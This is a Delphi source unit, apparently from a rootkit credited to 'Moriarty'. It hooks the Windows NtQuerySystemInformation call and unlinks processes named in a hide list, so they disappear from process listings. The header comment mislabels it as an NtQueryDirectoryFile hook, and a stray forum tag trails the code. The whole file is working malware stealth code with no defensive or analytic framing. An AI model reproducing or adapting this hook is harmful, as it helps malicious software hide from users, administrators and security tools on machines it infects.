unit uNtQuerySystemInformation;
(*
- NtQueryDirectoryFile Hook
- Moriarty
- Checks if a hidden file is in the process list. if so, remove from list.
- [Process Hide]
*)
interface
uses Windows, uNTConstants, LOMLib;
type
PProcessInfo = ^TProcessInfo;
TProcessInfo = record
dwOffset: dword; // an offset to the next Process structure
dwThreadCount: dword;
dwUnkown1: array[0..5] of dword;
ftCreationTime: TFileTime;
dwUnkown2: dword;
dwUnkown3: dword;
dwUnkown4: dword;
dwUnkown5: dword;
dwUnkown6: dword;
pszProcessName: PWideChar;
dwBasePriority: dword;
dwProcessID: dword;
dwParentProcessID: dword;
dwHandleCount: dword;
dwUnkown7: dword;
dwUnkown8: dword;
dwVirtualBytesPeak: dword;
dwVirtualBytes: dword;
dwPageFaults: dword;
dwWorkingSetPeak: dword;
dwWorkingSet: dword;
dwUnkown9: dword;
dwPagedPool: dword; // kbytes
dwUnkown10: dword;
dwNonPagedPool: dword; // kbytes
dwPageFileBytesPeak: dword;
dwPageFileBytes: dword;
dwPrivateBytes: dword;
dwUnkown11: dword;
dwUnkown12: dword;
dwUnkown13: dword;
dwUnkown14: dword;
ThreadInfo: dword; // Thread list
end;
var
MainNtQuerySystemInformation: function(dt: dword; buf: pointer; bufsize: dword; retlen: pointer): dword; stdcall;
szProcessHide : TStrList;
function HookNtQuerySystemInformation(dt: dword; buf: pointer; bufsize: dword; retlen: pointer): dword; stdcall;
implementation
{const
hide_process = 'chrome.exe';}
(******************************************************************************************************************************************)
function HookNtQuerySystemInformation(dt: dword; buf: pointer; bufsize: dword; retlen: pointer): dword; stdcall;
type
TBA = array[0..1000000] of byte;
PBA = ^TBA;
var
tmpbuf: PBA;
Pinfo, LastPinfo: PProcessInfo;
cp: DWORD;
curproc: string;
i: integer;
bHideProcess: Boolean;
begin
Result := MainNtQuerySystemInformation(dt, buf, bufsize, retlen);
if dt <> 5 then exit;
if result <> 0 then exit;
cp := 0;
tmpbuf := buf; LastPinfo := nil;
repeat
Pinfo := PProcessInfo(@tmpbuf[cp]);
curproc := WideCharToString(pinfo^.pszProcessName);
bHideProcess := false;
for i := 0 to szProcessHide.Count - 1 do
begin
if curproc = szProcessHide.Strings[i] then
begin
bHideProcess := true; Break;
end;
end;
//if Pos(hide_process, curproc) > 0 then bHideProcess := true;
if bHideProcess = true then
begin
if pinfo^.dwOffset = 0 then
begin
LastPinfo^.dwOffset := 0; exit;
end
else
LastPinfo^.dwOffset := LastPinfo^.dwOffset + pinfo.dwOffset;
end else
begin
LastPinfo := Pinfo;
end;
cp := cp + Pinfo^.dwOffset;
until Pinfo^.dwOffset = 0;
end;
(******************************************************************************************************************************************)
end.[/i]